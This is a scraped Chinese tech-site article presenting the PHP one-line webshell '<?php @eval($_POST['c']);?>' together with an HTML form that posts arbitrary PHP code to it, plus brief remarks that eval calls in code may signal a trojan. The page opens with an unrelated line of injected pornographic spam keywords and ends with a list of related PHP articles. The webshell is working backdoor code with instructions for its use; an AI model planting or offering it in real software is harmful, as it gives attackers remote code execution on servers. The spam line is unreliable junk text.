欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

php eval函數(shù)一句話(huà)木馬代碼

 更新時(shí)間:2015年05月21日 11:03:25   投稿:hebedich  
這個(gè)是php常見(jiàn)的一句話(huà)木馬的源碼,通過(guò)post木馬程序來(lái)實(shí)現(xiàn)木馬的植入,eval()函數(shù)把字符串按照PHP代碼來(lái)計(jì)算。該字符串必須是合法的PHP代碼,且必須以分號(hào)結(jié)尾。如果沒(méi)有在代碼字符串中調(diào)用return語(yǔ)句,則返回NULL。如果代碼中存在解析錯(cuò)誤,則eval()函數(shù)返回false。

eval可以用來(lái)執(zhí)行任何其他php代碼,所以對(duì)于代碼里發(fā)現(xiàn)了eval函數(shù)一定要小心,可能是木馬

就這一句話(huà)害死人,這樣任何人都可以post任何文件上來(lái),所以要做好防范

<?php @eval($_POST['c']);?>

使用方法也很簡(jiǎn)單,本地提交文件指向提交文件,里面的php代碼就會(huì)被執(zhí)行

<html> 
<body> 
<form action="a.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

以上所述就是本文的全部?jī)?nèi)容了,希望大家能夠喜歡。

相關(guān)文章

  • PHP中常用數(shù)組處理方法實(shí)例分析

    PHP中常用數(shù)組處理方法實(shí)例分析

    把php中常用的幾種處理數(shù)組的方法都整理了下,方便了大家學(xué)習(xí),大家可以逐個(gè)去運(yùn)行下,熟悉php數(shù)組的使用
    2008-08-08
  • php實(shí)現(xiàn)四舍五入的方法小結(jié)

    php實(shí)現(xiàn)四舍五入的方法小結(jié)

    這篇文章主要介紹了php實(shí)現(xiàn)四舍五入的方法,實(shí)例總結(jié)了php實(shí)現(xiàn)四舍五入的三種常用方法,具有一定參考借鑒價(jià)值,需要的朋友可以參考下
    2015-03-03
  • PHP循環(huán)與分支知識(shí)點(diǎn)梳理

    PHP循環(huán)與分支知識(shí)點(diǎn)梳理

    涉及到一些比較復(fù)雜的邏輯,分支與循環(huán)是必不可少的。通過(guò)分支和循環(huán)的結(jié)合使用可以使業(yè)務(wù)更加復(fù)雜,代碼功能更加強(qiáng)大,這篇文章主要介紹了PHP循環(huán)與分支知識(shí)點(diǎn)
    2022-11-11
  • php連接微軟MSSQL(sql server)完全攻略

    php連接微軟MSSQL(sql server)完全攻略

    在研究ezSQL的時(shí)候就看到了mssql_connect()等一些php提供的連接MSSQL的函數(shù),本以為php這個(gè)開(kāi)源的風(fēng)靡世界的編程語(yǔ)言對(duì)連接微軟的數(shù)據(jù)應(yīng)該是不在話(huà)下的,但是到真正執(zhí)行的時(shí)候,才發(fā)現(xiàn)困難多多
    2016-11-11
  • php中數(shù)字0和空值的區(qū)別分析

    php中數(shù)字0和空值的區(qū)別分析

    這篇文章主要介紹了php中數(shù)字0和空值的區(qū)別分析,用一個(gè)實(shí)例來(lái)供大家調(diào)戲,需要的朋友可以參考下
    2014-06-06
  • PHP SOCKET編程詳解

    PHP SOCKET編程詳解

    這篇文章主要介紹了PHP SOCKET編程詳解,需要的朋友可以參考下
    2015-05-05
  • 解決了Ajax、MySQL 和 Zend Framework 的亂碼問(wèn)題

    解決了Ajax、MySQL 和 Zend Framework 的亂碼問(wèn)題

    功夫不負(fù)有心人,花了將近一天時(shí)間,終于解決了Ajax 、MySQL 和 Zend Framework 的亂碼問(wèn)題?,F(xiàn)在總結(jié)如下,以供參考。
    2009-03-03
  • php采用curl實(shí)現(xiàn)偽造IP來(lái)源的方法

    php采用curl實(shí)現(xiàn)偽造IP來(lái)源的方法

    這篇文章主要介紹了php采用curl實(shí)現(xiàn)偽造IP來(lái)源的方法,主要涉及使用curl的CURLOPT_REFERER參數(shù)實(shí)現(xiàn)該功能,需要的朋友可以參考下
    2014-11-11
  • php自定義函數(shù)實(shí)現(xiàn)JS的escape的方法示例

    php自定義函數(shù)實(shí)現(xiàn)JS的escape的方法示例

    這篇文章主要介紹了php自定義函數(shù)實(shí)現(xiàn)JS的escape的方法,結(jié)合完整實(shí)例形式分析了php實(shí)現(xiàn)JS的escape功能函數(shù)的相關(guān)技巧,具有一定參考借鑒價(jià)值,需要的朋友可以參考下
    2016-07-07
  • ThinkPHP開(kāi)發(fā)框架函數(shù)詳解:C方法

    ThinkPHP開(kāi)發(fā)框架函數(shù)詳解:C方法

    這篇文章主要給大家講解ThinkPHP開(kāi)發(fā)框架函數(shù)詳解:C方法,有需要的朋友可以參考下
    2015-08-08

最新評(píng)論